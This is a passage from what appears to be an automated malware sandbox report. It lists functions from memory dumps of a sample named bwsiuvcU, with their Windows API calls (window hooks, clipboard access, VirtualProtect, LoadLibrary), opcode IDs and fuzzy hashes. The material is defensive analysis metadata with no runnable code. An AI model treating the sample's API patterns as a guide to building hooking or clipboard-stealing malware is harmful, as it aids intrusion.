                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Lf@A$Lf@A
                                                                                                                            • API String ID: 0-274663137
                                                                                                                            • Opcode ID: 72e1591d0df6c398fd70794b1522a00462f00f3da6a9fcd13e56b2e90709c991
                                                                                                                            • Instruction ID: 09769007eb26b4c4b4fcdae51e9a22ba965a208835b9d677bcaf4b8fcdbdc7ae
                                                                                                                            • Opcode Fuzzy Hash: 72e1591d0df6c398fd70794b1522a00462f00f3da6a9fcd13e56b2e90709c991
                                                                                                                            • Instruction Fuzzy Hash: E5013634910318AFDF44EBF9E95569D7FB2AF80304F1086A8C505AB299EE706F168792
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A32BED Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 41A32D02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 716092398-0
                                                                                                                            • Opcode ID: ad7860063de98bab60a1af55de18d1dd64cf5e8baccb7eae24d6150ef2d35248
                                                                                                                            • Instruction ID: 156081bc68315c14f50cb73dd929e1bfe647025f204deea59337621594e02af0
                                                                                                                            • Opcode Fuzzy Hash: ad7860063de98bab60a1af55de18d1dd64cf5e8baccb7eae24d6150ef2d35248
                                                                                                                            • Instruction Fuzzy Hash: C441BEB1C103499FDB14CF9AD884ADEBFB5FF88354F24812AE819AB250D775A845CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A32BF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 41A32D02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 716092398-0
                                                                                                                            • Opcode ID: bbc907b36a5c380932a4d289ba41e050a7899af1b574e83bccbc42a3536125fd
                                                                                                                            • Instruction ID: 360474837f951d582640cb438d2f3d9edb86a6acddd8441c5de1bda858e39049
                                                                                                                            • Opcode Fuzzy Hash: bbc907b36a5c380932a4d289ba41e050a7899af1b574e83bccbc42a3536125fd
                                                                                                                            • Instruction Fuzzy Hash: 6941CEB1C10349DFDB14CF9AD884ADEBFB5BF88354F24812AE819AB250D775A845CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A36574 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 41A37B39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallProcWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2714655100-0
                                                                                                                            • Opcode ID: a4ada090691d0411c20c0184cfc9147e1f8e55c2f53809e2b1a7c69eeeaaff24
                                                                                                                            • Instruction ID: 1666c34abf506998b0dfbdf2dc07238d695d87bcc6b320e828274a40245483ab
                                                                                                                            • Opcode Fuzzy Hash: a4ada090691d0411c20c0184cfc9147e1f8e55c2f53809e2b1a7c69eeeaaff24
                                                                                                                            • Instruction Fuzzy Hash: 6C4126B4900749DFDB14CF96C484B9ABBF5FB88314F25C459E519AB360C774A941CFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A37E4B Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,41A37D85), ref: 41A37E0F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 5723653539fd5542e674c9961755a0f616487545cb4f3962efdb42a038b5bb54
                                                                                                                            • Instruction ID: 423fdb8c8390bc86a7418e891105d5500ad9edb92fe136955b2333c2478cc423
                                                                                                                            • Opcode Fuzzy Hash: 5723653539fd5542e674c9961755a0f616487545cb4f3962efdb42a038b5bb54
                                                                                                                            • Instruction Fuzzy Hash: 46212775B016148BE715A7F8D41035EB6E6EBC9324F22843AD20AD7391EE35DC45CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A383FC Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 220874293-0
                                                                                                                            • Opcode ID: d7be4453ec04a562e364d1fe63519f25b1a81de4c1742b7993644a439d5e929c
                                                                                                                            • Instruction ID: da227b5f0dfb732cd639c2bf89e79ab8c361ad156ba0d8dc4a27e5fedeef2586
                                                                                                                            • Opcode Fuzzy Hash: d7be4453ec04a562e364d1fe63519f25b1a81de4c1742b7993644a439d5e929c
                                                                                                                            • Instruction Fuzzy Hash: B33102B0D01258DFEB24CF99D984B8DBBF1BF88314F208069E404AB291D775A845CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A37770 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 220874293-0
                                                                                                                            • Opcode ID: fae10cbcc00bd9ef9efa1f26794e7f3dcfa48cf8ea248aeab0f06f4cfb9410e9
                                                                                                                            • Instruction ID: aa7560852a1c5c5142787f556f23f885ef0363ebcd410dd26a4e54366757c964
                                                                                                                            • Opcode Fuzzy Hash: fae10cbcc00bd9ef9efa1f26794e7f3dcfa48cf8ea248aeab0f06f4cfb9410e9
                                                                                                                            • Instruction Fuzzy Hash: 983103B0D4160CDFDB20CF99D984B8EBBF5AF88314F248069E004BB291D775A845CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A367E1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 41A3686F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 50af8300c5cedbe44959e23f155747041da13d084a2be2dcc21d6924c9084ad4
                                                                                                                            • Instruction ID: 7bc11bc1f922a040b9356e20361b4118e362b24d2242b57c86766bb3d34634cf
                                                                                                                            • Opcode Fuzzy Hash: 50af8300c5cedbe44959e23f155747041da13d084a2be2dcc21d6924c9084ad4
                                                                                                                            • Instruction Fuzzy Hash: 4121E5B5D002489FDB10CF9AD985AEEBBF8EB48310F14841AE958A3250D378A941CF61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A367E8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 41A3686F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 7b4bdf9fd407549c7cdeae1a9616f6be3211d6d04f1110b67d821b8b5bdecd6a
                                                                                                                            • Instruction ID: 7ab3aeaf641f4f682c1c03b64b6c2ae965c0de08e0720b02baca3c05d10bb7bb
                                                                                                                            • Opcode Fuzzy Hash: 7b4bdf9fd407549c7cdeae1a9616f6be3211d6d04f1110b67d821b8b5bdecd6a
                                                                                                                            • Instruction Fuzzy Hash: 4421C4B5D002499FDB10CF9AD984ADEFFF4EB48310F14841AE958A3350D778A940CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A37408 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,41A37D85), ref: 41A37E0F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 264420072c1773345a88dfff676cc705efba4854d97e121f2b5ce7fc6b35d504
                                                                                                                            • Instruction ID: bf6d6b3c20a9354d7917c1e07b8fda98520022932805a2489f3a11016e84c5ed
                                                                                                                            • Opcode Fuzzy Hash: 264420072c1773345a88dfff676cc705efba4854d97e121f2b5ce7fc6b35d504
                                                                                                                            • Instruction Fuzzy Hash: 0021AEB0C043988FDB11DFA9D8447DEBFF4EF4A320F24409AD454AB251C3346849CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A3A078 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 41A3A0FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HookWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2559412058-0
                                                                                                                            • Opcode ID: f4ca6b4a6cef177ca5be676603463cdd8a97bac8c734a876674f0899ddbf7cb4
                                                                                                                            • Instruction ID: 53680c29af33b788f568d5c95e6d84fc7793f8db23b078fb7f77eb442e72f302
                                                                                                                            • Opcode Fuzzy Hash: f4ca6b4a6cef177ca5be676603463cdd8a97bac8c734a876674f0899ddbf7cb4
                                                                                                                            • Instruction Fuzzy Hash: 932134B5D002198FDB14DF9AC841BDEFBF5BB88320F10842AD428A7250C775A945CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A3A080 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 41A3A0FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HookWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2559412058-0
                                                                                                                            • Opcode ID: d8cd3fe0b33a4e05477f92b17f9fa3e87470ebdd02c4e71d96279d251b0e81d4
                                                                                                                            • Instruction ID: beba7d91706998a26f3a62e1956c1236dce7faf734683699390694c0189ff76e
                                                                                                                            • Opcode Fuzzy Hash: d8cd3fe0b33a4e05477f92b17f9fa3e87470ebdd02c4e71d96279d251b0e81d4
                                                                                                                            • Instruction Fuzzy Hash: 7921F4B5D002599FDB14DF9AD944BEEFBF5FB88320F10842AD429A7290C775A940CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 3D949118 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 3D94918C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1679941832.000000003D940000.00000040.00000800.00020000.00000000.sdmp, Offset: 3D940000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_3d940000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 514a93841bad8075ae1ee5fb4e135a0ab51adc5b5b74bdfb180a8f7128596d9f
                                                                                                                            • Instruction ID: 3c4ecfb0786aedd1d8992cd7ec65e9cec4fb3766e2899953fd67355929781572
                                                                                                                            • Opcode Fuzzy Hash: 514a93841bad8075ae1ee5fb4e135a0ab51adc5b5b74bdfb180a8f7128596d9f
                                                                                                                            • Instruction Fuzzy Hash: 8911E5B5D043499FDB20DFAAC844B9EFBF5EB48310F508429D519A7240C7799941CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41D60618 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,41D61359,00000800), ref: 41D613EA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 4c5a9e35e298f1319034375da358299e44cc3429e7aa345df9ef37c07f68d935
                                                                                                                            • Instruction ID: 98f71ca469a230243ef0e9fa47790dc5317b0dcb67802d3c3da0eb53e398ab60
                                                                                                                            • Opcode Fuzzy Hash: 4c5a9e35e298f1319034375da358299e44cc3429e7aa345df9ef37c07f68d935
                                                                                                                            • Instruction Fuzzy Hash: 801114B6C003498FDB20CF9AD844B9EFBF8EB88310F10842AE519A7640C775A945CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41D6137B Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,41D61359,00000800), ref: 41D613EA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 3b371d8966e6d5ef2769f4511b6673fd0bdf2ddf66d0204338b21d92041d396a
                                                                                                                            • Instruction ID: aa26a7e85e0eead90678015fee78a78c86d32d7d67e7d64a3007c90099c22fb3
                                                                                                                            • Opcode Fuzzy Hash: 3b371d8966e6d5ef2769f4511b6673fd0bdf2ddf66d0204338b21d92041d396a
                                                                                                                            • Instruction Fuzzy Hash: 0711E2B6D003498FDB20CFAAD844ADEFBF4EB88310F11842ED519A7640C779A545CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41D65B2F Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,41D6534A,00000000,00000000,3EDE4100,3DE0C974), ref: 41D65B98
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePeek
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2222842502-0
                                                                                                                            • Opcode ID: 828c370f72c9eb8e91b15367c30255418bd394e168012970f337b785406d256a
                                                                                                                            • Instruction ID: d93ac3a71a47ea49a6837c6e600c7d43f78901ba5dc174926d06e8e3fc081b7e
                                                                                                                            • Opcode Fuzzy Hash: 828c370f72c9eb8e91b15367c30255418bd394e168012970f337b785406d256a
                                                                                                                            • Instruction Fuzzy Hash: E91104B5C00249DFDB10CF9AD945BDEFBF8EB48320F10842AE958A3250C378A944CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A324BB Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 41A32526
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: f9e9b02a2ddb2c8ed79f6d9b096226252463a67f62e697804553c3627f4d2baf
                                                                                                                            • Instruction ID: fabd73fb1a2170760cd62d14c818fe27ee908ae12e7cb3f2b7a8c9bc99919e5d
                                                                                                                            • Opcode Fuzzy Hash: f9e9b02a2ddb2c8ed79f6d9b096226252463a67f62e697804553c3627f4d2baf
                                                                                                                            • Instruction Fuzzy Hash: 141134B5C006498FDB10CF9AD844BDEFBF4EB89310F10841AD419B3240C378A501CFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 4145F950 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 4145F9B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683993706.0000000041450000.00000040.00000800.00020000.00000000.sdmp, Offset: 41450000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41450000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1890195054-0
                                                                                                                            • Opcode ID: 8c88fa0693dbdac92c5c01f4622d5bf924f109bbb119b7b7466927f7f16296e0
                                                                                                                            • Instruction ID: 28a65851936677507d43a6500bce1740407108ac84ff76b339070c1cd9aedc45
                                                                                                                            • Opcode Fuzzy Hash: 8c88fa0693dbdac92c5c01f4622d5bf924f109bbb119b7b7466927f7f16296e0
                                                                                                                            • Instruction Fuzzy Hash: 861123B1C1065A9BDB20DF9AC541BDEFBF4AF48320F11812AD928B7340D778A941CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A314A0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 41A32526
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: d7916dace5eed5c41de291f7caba31e9e64e71c0a36c71f813a229a0ade2f231
                                                                                                                            • Instruction ID: 8cd311ffd4aefc208584d34eaceacd711f3b37085fd7e6a936a74b33fcf35c79
                                                                                                                            • Opcode Fuzzy Hash: d7916dace5eed5c41de291f7caba31e9e64e71c0a36c71f813a229a0ade2f231
                                                                                                                            • Instruction Fuzzy Hash: 1E11F3B5C006498BDB20DF9AD844B9EFBF4AB88324F10842AD519B7240C379AA45CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 3D9492E8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindCloseChangeNotification.KERNEL32 ref: 3D94934A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1679941832.000000003D940000.00000040.00000800.00020000.00000000.sdmp, Offset: 3D940000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_3d940000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2591292051-0
                                                                                                                            • Opcode ID: 70eaa21504b7e57b4d46d91c686e8c3c1b1e76002d1b405fc1225f0255a56698
                                                                                                                            • Instruction ID: 0781c3bf7fd65d47287e4b0bbc71edb2b89fdca032931e8ad3ceef61adf93321
                                                                                                                            • Opcode Fuzzy Hash: 70eaa21504b7e57b4d46d91c686e8c3c1b1e76002d1b405fc1225f0255a56698
                                                                                                                            • Instruction Fuzzy Hash: 2D1128B5D003498FDB24DFAAC44579EFBF8EB49220F108419D519A7240CB796941CBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A37DA8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,41A37D85), ref: 41A37E0F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 3e5737f66dab649b947ed6a942bb6c1517bd7ca10c0d58c2c19810352bbcc4af
                                                                                                                            • Instruction ID: 05cc034ebb873f914b0c3adccf71c636f74d7bd7ed6ea12257556b15fb0829c6
                                                                                                                            • Opcode Fuzzy Hash: 3e5737f66dab649b947ed6a942bb6c1517bd7ca10c0d58c2c19810352bbcc4af
                                                                                                                            • Instruction Fuzzy Hash: BE1133B48003498FDB20DF9AD845BDEFBF4EB49320F20845AD918A7240C379A945CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A37424 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,41A37D85), ref: 41A37E0F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: f9eae5599d79d49e8c0fed3bd006dec53b2f41dbac687804b06541702739e91e
                                                                                                                            • Instruction ID: b93d2ee2985525149f1df88006156b2c661f1d0834ce94b72d8473ec7213904b
                                                                                                                            • Opcode Fuzzy Hash: f9eae5599d79d49e8c0fed3bd006dec53b2f41dbac687804b06541702739e91e
                                                                                                                            • Instruction Fuzzy Hash: 4A1133B5800749CFDB20DF9AD845BDEFBF4EB48320F20841AD918A7240C378A940CFA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                            • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocString_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 959018026-0
                                                                                                                            • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                            • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                            • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                            • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B1214 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
